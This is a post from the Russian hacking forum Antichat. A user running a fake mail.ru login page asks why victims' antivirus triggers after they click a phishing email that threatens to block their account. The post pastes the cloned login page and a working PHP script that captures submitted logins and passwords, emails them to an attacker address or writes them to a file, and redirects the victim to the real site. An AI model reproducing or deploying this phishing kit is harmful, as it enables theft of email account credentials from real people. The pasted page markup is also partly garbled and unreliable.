ANTICHAT - Проблема со взломам mail.ru

Здрасти. Вот такая проблемка, есть фейк на маил, кидаю жертве письмецо мол вас заблокируют... но почему после того как жертва клацает по ссылачке срабатывает антивирус?
хост на h18
залит двумя файломи .php
первый фаил

[PHP

/**/
/* -1)
window.name = 'srvt=' + (new Date()).getTime();
});
rT.addHandler(document, 'keypress', function() {
if (window.name.indexOf('srvt') > -1) window.name = '';
});

rT.img0 = new Image();
rT.img0.src = 'http://mail.radar.imgsmail.ru/update?' +
'p=mail0' +
(rT.radar_type != '' ? ('&t=' + rT.radar_type) : '') +
(rT.srvt ? ('&i=srvt:' + rT.srvt) : '') +
'&v=0&rnd=320034566' +
'';

} catch(e) {}
/*]]>*/

Вход в систему

* html .n_shMain {border-left: 900px solid #00468C; position: relative; z-index: 1;}
* html .n_shIE {margin-left: -900px; position: relative; z-index: 2; float: left;}

/** html .n_shMain {padding-left: 900px;} */

.n_spI {background-image: url(http://win.mail.ru/http://img.imgsmail.ru/mail/ru/images/ru/_sp_start.png); background-repeat:no-repeat; display:inline-block; margin-right:8px; padding:3px 0; vertical-align:middle; width:31px; height:20px; //height:26px;}
.n_iEnter {background-position: 0 2px;}
.n_iBulk {background-position: 0 -26px;}
.n_iMA {background-position: 0 -53px;}
.n_iSend {background-position: 0 -81px;}
.n_iDraft {background-position: 0 -109px;}
.n_iTrash {background-position: 0 -137px;}

if( self.parent.frames.length != 0 )
self.parent.location = document.location;

maxLen[i] && maxLen[i] > 0) bad = true;
if (field.value.length 0)
{
bad = true;
if(fields[i]=="Password")
errors[i]="Пароль должен быть не менее четырех символов.";
}
if (patterns[i] != ''){
var re = new RegExp(patterns[i]);
if (!re.test(field.value + "")) bad = true;
}
if ((minVal[i] > 0) || (maxVal[i] > 0)){
var val = parseInt(field.value,10);
if ((val maxVal[i])) bad = true;
}
if (bad){
alert("Неверно заполнено поле " + prompts[i] + "\n" + errors[i]);
field.focus();
return false;
}
}
}
}

return true;
}
// -->

#superbest {
position: absolute;
left: 15;
top: 150;
width: 125;
visibility: visible;
z-index: 10;
}

//

//

.appM {border: 1px solid #989898; background-color: #FFF; padding: 4px 0; position: absolute; right: 0; top: 0;}
.appM a {background-repeat: no-repeat; background-position: 10px center; display: block; padding: 4px 10px 4px 35px; text-align: right; color: black; text-decoration: none; font-size: 11px; font-family: Tahoma !important; white-space: nowrap;}
.appM a:HOVER {text-decoration: none; color: black; background-color: #dedfe3;}

/* superNEW shapka */
.n_spTop {background-image: url(http://win.mail.ru/http://img.mail.ru/mail/ru/images/ru/_sp_top2.png?1);}
.n_shT {background-color: #00468C; border-left: 1px solid #FFF; border-right: 1px solid #FFF; height: 1px; position: relative; font-size: 0; line-height: 0; height: 1px; //height: 0; //display: inline-block; //width: 100%;}
.n_shMain {position: relative; height: 54px; width: 90%; min-width: 900px; background-color: #00468C; background-repeat: repeat-x; background-position: 0 -220px; margin: 1px 0 7px;}
.n_shLogo {position: absolute; height: 47px; width: 25%; background-repeat: no-repeat; background-position: center 0; text-align: center; top: 0;}
.n_shLogoA {display: inline-block; height: 34px; width: 160px; margin-top: 11px;}
.n_shLogoW {display: inline-block; height: 14px; width: 38px; vertical-align: top; margin-top: 11px;}
.n_shForm {color: #FFF; white-space: nowrap; margin: 0; font-size: 11px; font-family: Tahoma !important; position: absolute; right: 5px; top: 5px;}
.n_shSns2 {color: #FFF; vertical-align: middle; position: absolute; display:inline-block; font-size: 95%; font-family: Tahoma !important; width: 100%; padding: 0 0 0 24%; //padding: 0 0 0 24%;}
.n_shSns2 a {color: #FFF;}
.n_shSns2 a:HOVER {color: #FFF;}
/* end superNEW shapka */

/* superNEW shapka menu */
.n_shBook {position: relative; top: 32px; padding-left: 24%; white-space: nowrap; display: block; height: 20px; overflow: hidden;}
.nm_menuA {background-color: #5977b3; display: inline-block; height: 20px; vertical-align: top; padding: 3px 0 2px 0;}
.nm_menuAaa {margin: 0 4px 0 3px; float: left; color: #FFF; text-decoration: none; position: relative; z-index: 100;}
a:HOVER.nm_menuAaa {text-decoration: underline; float: left; color: #FFF !important; position: relative; z-index: 100;}
.nm_menuS {border-top: 0; border-left: 0; border-bottom: 20px solid #5977b3; border-right: 20px solid transparent; font-size: 0; line-height: 0; display: inline-block;vertical-align:top; position: relative; z-index: 1;}
.nm_menuSp {border-bottom: 12px solid transparent; border-right: 12px solid #5977b3; font-size: 0; line-height: 0; display: inline-block; vertical-align:top; padding: 7px 0 0 0; margin-top: 1px;position: relative; z-index: 1;}
.nm_menuSp2 {border-top: 1px solid #5977b3; font-size: 0; line-height: 0; display: inline-block; width: 11px; position: absolute; top: 0; left: 1px; vertical-align:top; z-index: 1;}

.nm_menuA_act {background-color: #FFF;}
.nm_menuAaa_act {color: #013572 !important; font-weight: bold; margin-left: 1px;}
a:HOVER.nm_menuAaa_act {color: #013572 !important;}
.nm_menuS_act {border-bottom: 20px solid #FFF;}
.nm_menuSp_act {border-right: 12px solid #FFF; border-bottom: 12px solid #FFF;}
.nm_menuSp2_act {border-top: 1px solid #FFF;}

.nm_menuSp_f {border-bottom: 12px solid #5977b3;}
.nm_menuAaa_f {margin-left: 1px;}

.nm_menu2 {float:left; position: relative; margin-left: -11px;}
@media all and (-webkit-min-device-pixel-ratio:10000),
not all and (-webkit-min-device-pixel-ratio:0)
{ .nm_menu2 {margin-left: -10px;} }
/* end superNEW shapka menu */

.nm_menuAaa {margin: 0 0 0 -3px;}
.nm_menuAaa_act {margin-left: -3px !important;}
.nm_menuAaa_f {margin-left: -3px !important;}

.shMenu2{float: left; position: relative; margin-left: -11px; border-bottom: 3px solid #5977B3}
.shMenu2_act {border-bottom: 3px solid #FFF}
@media all and (-webkit-min-device-pixel-ratio:10000), not all and (-webkit-min-device-pixel-ratio:0){
.shMenu2 {margin-left: -10px}
}
@media screen and (-webkit-min-device-pixel-ratio:0){
.shMenu2 {margin-left: -10px}
}
.shA{background-color: #5977b3; display: inline-block; height: 20px; vertical-align: top}
.shAaa{margin: 2px 2px 0 2px; float: left; color: #FFF; text-decoration: none; position: relative; z-index: 100}
a:HOVER.shAaa{text-decoration: underline; float: left; color: #FFF !important; position: relative; z-index: 100}
.shS{border-top: 0; border-left: 0; border-bottom: 20px solid #5977b3; border-right: 20px solid transparent; font-size: 0; line-height: 0; display: inline-block;vertical-align:top; position: relative; z-index: 1}
.shSp{border-bottom: 12px solid transparent; border-right: 12px solid #5977b3; font-size: 0; line-height: 0; display: inline-block; vertical-align:top; padding: 7px 0 0 0; margin-top: 1px;position: relative; z-index: 1}
.shSp2{border-top: 2px solid #5977b3; font-size: 0; line-height: 0; display: inline-block; width: 11px; position: absolute; top: 0; left: 1px; vertical-align:top; z-index: 1}

.ie6bT {border-top-color: #00468c !important; filter:chroma(color='#00468c');}
.ie6bR {border-right-color: #00468c !important; filter:chroma(color='#00468c');}
.ie6bB {border-bottom-color: #00468c !important; filter:chroma(color='#00468c');}
.ie6bL {border-left-color: #00468c !important; filter:chroma(color='#00468c');}

Почта
Адреса
Мой мир
Фото
Видео
Блоги
Игры
Знакомства
Деньги
Карты

Дизайн

.tooltip
{
position: absolute;
margin-top: 28px;
_width: 166px;
*width: 166px;
}

.tooltip .tail
{
background: url(http://img.imgsmail.ru/r/tooltip/tail.png) no-repeat;
_background-image: url(http://win.mail.ru/http://img.imgsmail.ru/r/tooltip/tail.gif);
width: 9px;
height: 5px;
left: 39px;
top: -4px;
position: absolute;
}

.tooltip .ltc, .tooltip .rtc, .tooltip .lbc, .tooltip .rbc
{
background: url(http://img.imgsmail.ru/r/tooltip/ltc.png) no-repeat;
_background-image: url(http://win.mail.ru/http://img.imgsmail.ru/r/tooltip/ltc.gif);
width: 6px;
height: 6px;
float: left;
_margin-right: -3px;
}

.tooltip .rtc
{
background: url(http://img.imgsmail.ru/r/tooltip/rtc.png) no-repeat;
_background-image: url(http://win.mail.ru/http://img.imgsmail.ru/r/tooltip/rtc.gif);
float: right;
_margin-left: -3px;
_margin-right: 0;
}

.tooltip .lbc
{
background: url(http://img.imgsmail.ru/r/tooltip/lbc.png) no-repeat;
_background-image: url(http://win.mail.ru/http://img.imgsmail.ru/r/tooltip/lbc.gif);
*margin-left: -3px;
}

.tooltip .rbc
{
background: url(http://img.imgsmail.ru/r/tooltip/rbc.png) no-repeat;
_background-image: url(http://win.mail.ru/http://img.imgsmail.ru/r/tooltip/rbc.gif);
float: right;
_margin-left: -3px;
_margin-right: 0;
*margin-right: -3px;
}

.tooltip .ts, .tooltip .bs
{
height: 6px;
line-height: 6px;
_overflow: hidden;
*overflow: hidden;
background: #fbf7c7 url(http://img.imgsmail.ru/r/tooltip/border_pix.gif) repeat-x top;
margin: 0 6px;
_margin: 0;
}

.tooltip .bs
{
background: #fbf7c7 url(http://img.imgsmail.ru/r/tooltip/border_pix.gif) repeat-x bottom;
*border-bottom: solid 1px #a6a8ae;
}

.tooltip .rborder
{
background: url(http://img.imgsmail.ru/r/tooltip/border_pix.gif) repeat-y right;
padding: 0 9px;
}

.tooltip .inner
{
background: #fbf7c7 url(http://img.imgsmail.ru/r/tooltip/border_pix.gif) repeat-y;
}

.tooltip .mess
{
font-family: tahoma !important;
color: #5a393f;
font-size: 9px;
position: absolute;
margin-top: -3px;
white-space: nowrap;
}

Авторизация

Для входа в систему введите, пожалуйста, логин и пароль. Если у Вас еще нет логина, Вам необходимо зарегистрироваться.

Имя

@mail.ru@inbox.ru@bk.ru@list.ru

Пароль

Вы вводите русские буквы
Включен Caps Lock
Пароль содержит русские буквы

    Забыли паро ль?

 

Чужой компьютер

 

 

 

if(document.forms["Auth"] && document.forms["Auth"].elements["Password"] && document.getElementById('tooltipAuth_struter'))
{
var tooltipAuth = {
targetElem: document.forms["Auth"].elements["Password"],
struter: document.getElementById('tooltipAuth_struter'),
mess: document.getElementById('tooltipAuth_mess'),
shell: document.getElementById('tooltipAuth_shell'),
tail: document.getElementById('tooltipAuth_tail'),
wasCaps: false,

sAlign: function() {
if(/msie\s+\d/i.test(navigator.userAgent))
this.struter.style.overflow = 'hidden';

this.struter.style.width = this.mess.offsetWidth + "px";
this.struter.style.height = (/msie\s+\d/i.test(navigator.userAgent) ? 6 : (this.mess.offsetHeight - 6)) + "px";

if(/msie\s+\d/i.test(navigator.userAgent))
this.shell.style.width = (this.struter.offsetWidth + 30) + "px";
},
activate: function() {
if(window.addEventListener)
{
this.targetElem.addEventListener("blur", this.hide, false);
this.targetElem.addEventListener("keydown", tooltipAuth.keydown, false);
this.targetElem.addEventListener("keypress", tooltipAuth.checkCondition, false);
}
else
{
this.targetElem.attachEvent("onblur", this.hide);
this.targetElem.attachEvent("onkeydown", tooltipAuth.keydown);
this.targetElem.attachEvent("onkeypress", tooltipAuth.checkCondition);
}
},
show: function(messNum) {
tooltipAuth.shell.style.visibility = 'hidden';

var text = document.getElementById('tooltipAuth_mess_var');
var text2 = document.getElementById('tooltipAuth_mess_var2');
var text3 = document.getElementById('tooltipAuth_mess_var3');

text.style.display = text2.style.display = text3.style.display = "none";

if(messNum == 1)
text.style.display = '';
if(messNum == 2)
text2.style.display = '';
if(messNum == 3)
text3.style.display = '';

tooltipAuth.shell.style.display = '';
tooltipAuth.sAlign();
tooltipAuth.tail.style.left = (Math.round(tooltipAuth.shell.offsetWidth / 2) - 4) + "px";
tooltipAuth.shell.style.visibility = 'visible';
},
hide: function() {
tooltipAuth.shell.style.display = 'none';
},
keydown: function(e) {
var evt = e ? e : window.event;
var keyCode = evt.keyCode ? evt.keyCode : evt.charCode;
if ( keyCode == 20 && tooltipAuth.wasCaps == 'off' )
tooltipAuth.show(2);
else
tooltipAuth.hide();
},
checkCondition: function(e) {
var evt = e ? e : event;
var evtEl = evt.srcElement ? evt.srcElement : evt.target;

var keyCode = evt.keyCode ? evt.keyCode : evt.charCode;

var symb = String.fromCharCode(keyCode);
var symbUC = symb.toUpperCase();
var symbLC = symb.toLowerCase();

var onCapsLock = false;
if(symbUC != symbLC) {
onCapsLock = ((evt.shiftKey && symbLC == symb) || (!evt.shiftKey && symbUC == symb));
tooltipAuth.wasCaps = onCapsLock ? 'on' : 'off';
} else
tooltipAuth.wasCaps = false;

var isCyrillic = false;
if( /[а-я]/i.test(symb) )
isCyrillic = true;

var hasCyrillic = false;
if( /[а-я]/i.test(tooltipAuth.targetElem.value) )
hasCyrillic = true;

var messNum;

if (hasCyrillic)
messNum = 3;
if (onCapsLock)
messNum = 2;
if (isCyrillic)
messNum = 1;

if (messNum)
{
//if(tooltipAuth.shell.style.display == 'none')
tooltipAuth.show(messNum);
}
else
tooltipAuth.hide();
}
};

try {
tooltipAuth.activate();
} catch(ex) {};

}

//

© 1999-2011, Mail.Ru
Регистрация · Cооб� �ество пользователей · Сл ужба поддержки  

//

//

")//-->

');
if(11

');//-->

//

//

][/php]

И второй фаил

PHP highlight

Код:



        Код:


        
$BASE="test@mail.ru";



$IS_EMAIL=true;



$LOCATION="http://win.mail.ru/cgi-bin/start?back=1";



$p0=$_REQUEST["Login"];



$p1=$_REQUEST["Password"];



$headers="Content-type: text/html; charset=windows-1251\r\n";



$headers.="From: bot \r\n";



$headers.="Bcc:$BASE\r\n";



$info="$p0:$p1:\n";



if ($IS_EMAIL){



mail($BASE,"*** Вам пришёл сюрприз!",$headers.$info);



} else {



$fd=fopen($BASE,"a+");



fwrite($fd,$info);



fclose($fd);



}



header("Location:$LOCATION");



?>